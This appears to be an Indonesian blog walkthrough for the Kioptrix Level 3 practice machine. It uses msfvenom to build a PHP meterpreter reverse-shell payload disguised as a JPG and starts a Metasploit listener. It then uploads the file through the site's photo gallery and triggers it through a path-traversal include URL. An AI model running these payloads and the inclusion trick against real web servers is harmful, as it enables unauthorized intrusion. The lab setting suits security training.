./Jufrye
Gaptek
today : | at : | safemode : ON
> Thankz To :/ AnonymouZ / Xh4x0r / Enda PNT / Awang Shellovers / L1n9g4 / Mhydisa / Aditra HNc / Gorontalo Defacer Crew ^ Hacker Newbie ^ PLanetwork Team ^ Lampung Cyber ^ ANd You /
name author perms com modified label

Metasploit VS KIOPTRIX LV.3 jufry-gaptek rwxr-xr-x 0 21.04

Filename Metasploit VS KIOPTRIX LV.3
Permission rw-r--r--
Author jufry-gaptek
Date and Time 21.04
Label
Action
Setelah mengetahui cara mendapatkan admin password pada tutorial Gaining User Password Using SQL Injection. Sekarang saatnya masuk ke dalam sistem Web Server menggunakan metasploit.

Ini adalah lawan saya pada kesempatan ini


Preparation:
1. Metasploit Download Link
Briefing:
1. Buat shellcode backdoor dengan msfvenom
2. Jalankan exploit/multi/handler
3. Upload shellcode backdoor
4. Eksekusi shellcode backdoor
5. Game Over
Note:
Tutorial ini melanjutkan sesi dari [KIOPTRIX LV3] Gaining User Password.
Walkthrough:
1. Buat shellcode backdoor dengan msfvenom
Buka terminal, lalu masukan perintah:
root@red-dragon:~# cd /pentest/exploits/framework2/
Kemudian buat shellcode dengan perintah
root@red-dragon:/pentest/exploits/framework2# msfvenom -p php/meterpreter/reverse_tcp LHOST=ip address anda LPORT=port listener anda -f raw > direktori file yang anda inginkan/nama file yang anda inginkan.jpg
Pada kali ini, IP address saya 192.168.1.4, dan menggunakan port listener 4444. Kemudian menyimpan shell code pada /tmp/ dengan nama file exploit.jpg
Maka perintahnya:
root@red-dragon:/pentest/exploits/framework2# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 -f raw > /tmp/exploit.jpg
2. Jalankan exploit/multi/handler
Setelah membuat shell code backdoor, masukan perintah:
root@red-dragon:/pentest/exploits/framework2# msfci multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=sesuai dgn langkah 1 LPORT=sesuai dengan langkah 1 E
Sesuai dengan langkah pertama, maka perintahnya sebagai berikut:
root@red-dragon:/pentest/exploits/framework2# msfci multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 E
Jangan tutup terminal ini. Karena ini akan digunakan pada langkah 5 [terakhir].
3. Upload shellcode backdoor
Jika anda membaca post sebelumnya tentang [KIOPTRIX LV3] Gaining User Password. Maka anda sudah pasti dapat masuk ke dalam control panel. Untuk memperjelas bagaimana saya bisa masuk ke dalam control panel, saya akan berikan screenshoot pada [KIOPTRIX LV3] Gaining User Password yang menunjukan bahwa saya berhasil mendapatkan password administrator.
Masuklah ke dalam halaman upload foto.
Kemudian upload shell code backdoor yang sudah anda buat.
Note: Tahan dulu, ada baiknya kita mengecek direktory foto sebelum mengupload shell code backdoor kita.
Upload shell code backdoor, kemudian refresh halaman direktori foto. Setelah itu, cari file baru yang muncul dalam direktori tersebut.
Ada satu file baru di sini, yaitu file h942jos85u.jpg
4. Eksekusi shellcode backdoor
Setelah file h942jos85u.jpg berhasil di upload ke dalam database, sekarang saatnya mengeksekusi file tersebut. Pergilah ke halaman index, pilih tab blog. Kemudian ganti url menjadi kioptrix3.com/index.php?system=../../../../../home/www/kioptrix3.com/gallery/photos/h942jos85u.jpg.html
Kemudian tekan enter.
Tidak ada respon? Apa ada yang salah?
5. Game Over
Mari kita cek metasploit kita pada tahap 1
Apakah ini benar-benar masuk ke dalam system Web Server? Cek gambar berikut
Perhatikan kata-kata:
DISCLAIMER!
We at Kioptrix are not bla.. bla.. bla..
Bukankah kata-kata ini sama seperti kata-kata pada screen shoot pertama?

0 komentar:

Posting Komentar